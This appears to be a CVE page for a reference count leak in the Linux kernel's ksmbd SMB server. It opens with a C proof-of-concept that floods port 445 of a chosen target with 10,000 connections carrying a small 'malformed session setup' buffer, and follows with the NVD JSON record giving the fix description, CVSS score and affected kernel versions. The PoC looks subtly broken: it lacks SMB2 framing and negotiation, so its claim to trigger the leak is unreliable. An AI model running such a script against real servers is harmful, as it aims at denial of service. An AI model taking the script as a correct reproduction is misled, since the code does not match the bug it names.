CVE-2025-71150

// CVE-2025-71150 PoC - Reference Count Leak in ksmbd session lookup // This PoC demonstrates triggering the reference count leak condition #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #define SMB2_PORT 445 #define MAX_REQUESTS 10000 // Simulate SMB2 session lookup with invalid session state int trigger_session_lookup_leak(int sock) { // SMB2 Session Setup Request with invalid session unsigned char session_setup_req[] = { 0x00, 0x00, 0x00, 0x00, // Structure size 0x01, 0x00, // Flags 0x00, 0x00, // Mode 0x00, 0x00, 0x00, 0x00, // Capabilities 0x00, 0x00, 0x00, 0x00, // Channel 0x00, 0x00, // Security blob length 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 // Previous session id }; // Send malformed session setup to trigger invalid session state send(sock, session_setup_req, sizeof(session_setup_req), 0); return 0; } int main(int argc, char *argv[]) { int sock; struct sockaddr_in server; char *target_ip = argv[1] ? argv[1] : "127.0.0.1"; printf("[*] CVE-2025-71150 PoC - ksmbd session refcount leak\n"); printf("[*] Target: %s:%d\n", target_ip, SMB2_PORT); for (int i = 0; i < MAX_REQUESTS; i++) { sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { perror("[-] Socket creation failed"); return 1; } server.sin_family = AF_INET; server.sin_port = htons(SMB2_PORT); server.sin_addr.s_addr = inet_addr(target_ip); if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == 0) { trigger_session_lookup_leak(sock); } close(sock); if (i % 100 == 0) { printf("[*] Sent %d requests...\n", i); } } printf("[+] Completed %d session lookup attempts\n", MAX_REQUESTS); return 0; }

{"cve": {"id": "CVE-2025-71150", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T15:16:05.773", "lastModified": "2026-04-18T09:16:13.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix refcount leak when invalid session is found on session lookup\n\nWhen a session is found but its state is not SMB2_SESSION_VALID, It\nindicates that no valid session was found, but it is missing to decrement\nthe reference count acquired by the session lookup, which results in\na reference count leak. This patch fixes the issue by explicitly calling\nksmbd_user_session_put to release the reference to the session."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nksmbd: Soluciona la fuga de contador de referencias cuando se encuentra una sesión inválida en la búsqueda de sesión\n\nCuando se encuentra una sesión pero su estado no es SMB2_SESSION_VALID, indica que no se encontró ninguna sesión válida, pero falta decrementar el contador de referencias adquirido por la búsqueda de sesión, lo que resulta en una fuga de contador de referencias. Este parche soluciona el problema llamando explícitamente a ksmbd_user_session_put para liberar la referencia a la sesión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.176", "versionEndExcluding": "5.16", "matchCriteriaId": "B11177EA-CF04-4864-B5AE-7597A4239BC3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.121", "versionEndExcluding": "6.1.160", "matchCriteriaId": "D8983128-8A47-4317-B02E-D9072E423085"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.67", "versionEndExcluding": "6.6.120", "matchCriteriaId": "B82378A7-0B64-484B-B28D-3A09913AEE0E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.6", "versionEndExcluding": "6.12.64", "matchCriteriaId": "2D247316-17E2-4AF9-B5C9-DFF7DCADAE1E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc3:*:*:*:*:*:*", "matchCriteriaId": "DE491969-75AE-4A6B-9A58-8FC5AF98798F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc4:*:*:*:*:*:*", "matchCriteriaId": "93C0660D-7FB8-4FBA-892A-B064BA71E49E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc5:*:*:*:*:*:*", "matchCriteriaId": "034C36A6-C481-41F3-AE9A-D116E5BE6895"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc6:*:*:*:*:*:*", "matchCriteriaId": "8AF9DC49-2085-4FFB-A7E3-73DFAFECC7F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc7:*:*:*:*:*:*", "matchCriteriaId": "5DFCDFB8-4FD0-465A-9076-D813D78FE51B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/02e06785e85b4bd86ef3d23b7c8d87acc76773d5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0fb87b28cafae71e9c8248432cc3a6a1fd759efc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/11fe566b442e3bc2774191740fd377739a87a1c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8cabcb4dd3dc85dd83a37d26efcc59a66a4074d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cafb57f7bdd57abba87725eb4e82bbdca4959644", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e54fb2a4772545701766cba08aab20de5eace8cd", "source": "416baaa9- ... (truncated)